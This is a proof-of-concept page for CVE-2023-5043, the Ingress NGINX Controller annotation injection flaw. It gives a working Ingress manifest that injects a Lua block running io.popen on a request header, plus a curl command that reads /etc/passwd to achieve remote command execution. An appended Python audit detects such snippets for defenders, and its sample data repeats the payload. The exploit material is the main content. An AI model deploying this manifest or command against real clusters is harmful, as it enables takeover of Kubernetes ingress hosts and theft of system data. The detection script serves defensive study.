PoC details: b1309892595133d785d9f9148290d1a94ff3faca

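Related vulnerability
Title: Ingress NGINX Controller injection vulnerability (CVE-2023-5043)
Description: Ingress NGINX Controller is the open-source ingress controller for Kubernetes from the Kubernetes project. Ingress NGINX Controller contains a security vulnerability that an attacker can exploit to execute arbitrary commands.
Description
PoC CVE-2023-5043
Introduction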
# CVE-2023-5043
**Ingress nginx annotation injection causes arbitrary command execution**

1. Create an Ingress (it can be created without a Service or Pod):
```yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: ingress-exploit
  annotations:
    kubernetes.io/ingress.class: "nginx"
    nginx.ingress.kubernetes.io/configuration-snippet: |
      more_set_headers "robinak"
            proxy_pass http://upstream_balancer;
                                proxy_redirect                          off;
        }
        location /robinak/ { content_by_lua_block { local rsfile = io.popen(ngx.req.get_headers()["cmd"]);local rschar = rsfile:read("*all");ngx.say(rschar); } } location /fs/{
spec:
  rules:
  - host: robinak.me
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: exploit
            port:
              number: 80
```
2. Send a request to the public address of your Ingress NGINX controller:
```bash
curl -v -H 'Host: robinak.me' -H "cmd: cat /etc/passwd" http://IP/robinak/
```
3. Got RCE
![1cveed](https://github.com/r0binak/CVE-2023-5043/assets/80983900/218a28ca-5f7f-427e-87a4-c025ff97f496)
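
For defenders, an added example (not part of the PoC repository): a Python audit that flags Ingress objects whose snippet annotations close the generated `location` block and open new ones, as the annotation above does. It assumes input shaped like `kubectl get ingress -A -o json`; the pattern set and the sample data are constructed for this example and are heuristic.

```python
import json
import re

# Annotation name suffixes that carry raw NGINX configuration.
SNIPPET_KEYS = ("/configuration-snippet", "/server-snippet")
# Heuristic indicators (assumptions of this example, not an official rule set).
PATTERNS = {
    "lua-block": re.compile(r"\b\w+_by_lua(_block|_file)?\b"),
    "new-location": re.compile(r"(^|[;}\s])location\s+[^;{]*\{", re.M),
    "process-exec": re.compile(r"\b(io\.popen|os\.execute)\b"),
}

def brace_escape(snippet):
    """True if a '}' closes a block the snippet never opened (it leaves its own context)."""
    depth = 0
    for ch in snippet:
        depth += {"{": 1, "}": -1}.get(ch, 0)
        if depth < 0:
            return True
    return False

def audit_ingresses(doc):
    """Audit a parsed `kubectl get ingress -A -o json` document; return a list of findings."""
    findings = []
    for item in doc.get("items", []):
        meta = item.get("metadata", {})
        for key, value in (meta.get("annotations") or {}).items():
            if not key.endswith(SNIPPET_KEYS):
                continue
            reasons = ["brace-escape"] if brace_escape(value) else []
            reasons += [name for name, rx in PATTERNS.items() if rx.search(value)]
            if reasons:
                findings.append((meta.get("namespace", "default"), meta.get("name"), key, reasons))
    return findings

# Constructed sample input: one benign snippet, one shaped like the annotation on this page.
PREFIX = "nginx.ingress.kubernetes.io"
SAMPLE = {"items": [
    {"metadata": {"namespace": "web", "name": "headers-only", "annotations": {
        PREFIX + "/configuration-snippet": 'more_set_headers "X-Frame-Options: DENY";\n'}}},
    {"metadata": {"namespace": "default", "name": "ingress-exploit", "annotations": {
        PREFIX + "/configuration-snippet":
            'more_set_headers "robinak"\nproxy_pass http://upstream_balancer;\n}\n'
            'location /robinak/ { content_by_lua_block { io.popen(ngx.req.get_headers()["cmd"]) } } location /fs/{\n'}}},
]}

if __name__ == "__main__":
    print(json.dumps(audit_ingresses(SAMPLE), indent=2))
```

Against a live cluster, parse the output of `kubectl get ingress -A -o json` with `json.load` and pass it to `audit_ingresses` in place of `SAMPLE`.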
File snapshot

```
[4.0K] /data/pocs/b1309892595133d785d9f9148290d1a94ff3faca
└── [1.2K] README.md

0 directories, 1 file
```